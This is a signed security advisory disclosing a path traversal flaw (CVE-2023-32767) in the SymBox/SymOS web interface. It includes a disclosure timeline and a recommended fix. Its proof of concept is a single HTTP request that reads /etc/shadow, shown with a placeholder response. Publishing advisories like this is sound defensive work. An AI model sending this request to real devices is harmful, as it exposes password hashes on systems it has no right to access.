-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-014 Product: SymBox, SymOS Manufacturer: Symcon GmbH Affected Version(s): 5.5, 6.3 (i.e., before 2023-05-12) Tested Version(s): 5.5 Vulnerability Type: Path Traversal (CWE-22) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2023-05-11 Solution Date: 2023-05-12 Public Disclosure: 2023-05-17 CVE Reference: CVE-2023-32767 Author of Advisory: Marc Gessler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: SymOS is an operating system that was developed for using the SymBox. The manufacturer describes the product as follows (see [1]): "The SymBox is our smart All-In-One solution. The integrated SymOS was specially developed for IP-Symcon and handles the otherwise troublesome system configuration. Thus, you can focus on the important part: Setting up your SmartHome." Due to insufficient validation of user-provided input, its web interface is vulnerable to path traversal attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: A path traversal vulnerability was discovered on the product's web interface. By sending a specially crafted HTTP request to the web interface, files and directories outside the web root can be read and sensitive information can be accessed. Furthermore, as the web interface is running with root privileges, it is possible to read sensitive files, for example "/etc/shadow". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Request: GET /../../../../../../../../../etc/shadow HTTP/1.1 Response: HTTP/1.1 200 OK Content-Type:text/html X-Content-Length:109 Content-Length: 109 ETag:"abcdefghijklmnopqrtstuvwxyz" root:$5$12345678$abcdefghijklmnopqrtstuvwxyz:10933:0:99999:7::: avahi:*::::::: dbus:*::::::: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Validate all user-supplied path values on the server side and do not allow access to directories outside the web root or to other sensitive files. Additionally, check if the web interface must be run with root privileges. If these privileges are not required, run the web interface with lower privileges. More information: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-05-09: Vulnerability discovered 2023-05-11: Vulnerability reported to manufacturer 2023-05-12: Patch released by manufacturer 2023-05-17: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Linux SymBox / SymOS https://www.symcon.de/en/product/symbox/ [2] SySS Security Advisory SYSS-2023-014 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-014.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Marc Gessler of SySS GmbH. E-Mail: marc.gessler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/marc_gessler.asc Key ID: 0x5077DCEB1C98D0A2 Key Fingerprint: 3F7B B558 6734 8FCF 25A0 F596 5077 DCEB 1C98 D0A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEP3u1WGc0j88loPWWUHfc6xyY0KIFAmRnGtMACgkQUHfc6xyY 0KIFwBAAk+VHaB7Mk40rfa73eJ84UDGIV8aP98LxtHmI/TKblJMpXhBeSSNv3fLX eM6z8XjzQ8sO4CcxlaaEAMY5g5KnKG0GrmIdERTFQvLcLrJrP8unnOFd7PGz9se5 40dwAkg6p4i6ORe15ROWJgs2V8tiYQ7eR5v+Y3Ez/1mXzeV9BjWh69AmBTJnrZdL 4oEGkIYhjno1LvDNX0mieG/YPZ4typBpuENSUGaPnOiTw0+qIubwv8d1c5Q64+QV FjZFz+A/IlcaTpxHPjxCOw2taaKdV2CQqXK1aVsH6kWEEb/hPsGWcpq99lPrboam vXZ+yes3Nd7KqrxTQ+j04HtnRfrLzzt8iNjYTklAF8WgQw+8WG4Wq9x9kc00XMDH KFb6LqFe+t3X0NQXemsi+3oLVdZnKQSfnW162FsIO3bsznvinfkZDOZycMnRZb7G CaLmKlzZ60jJLmkDCdWuoN55yt9WcHGFWcFJVX20ula1OtCn57hoVvD7HXAE0xdV T5EDNOSsGJm209QJ20YWCtl5R7VtP4R4PpHnT3F8Ucqf+XFCqfSA7VQ4A4YsbZsB JnZImc4ATA7MMxPV2UwbDFfaeFRib61bhZOG7Dih4RLDk5yGFgi1OQHWE9RZ4T7K cle4aGLkxhTUW8AdzpvAIXGV2HMJo7mrSZcyLMjxkfW0yaS/Gok= =oGdH -----END PGP SIGNATURE-----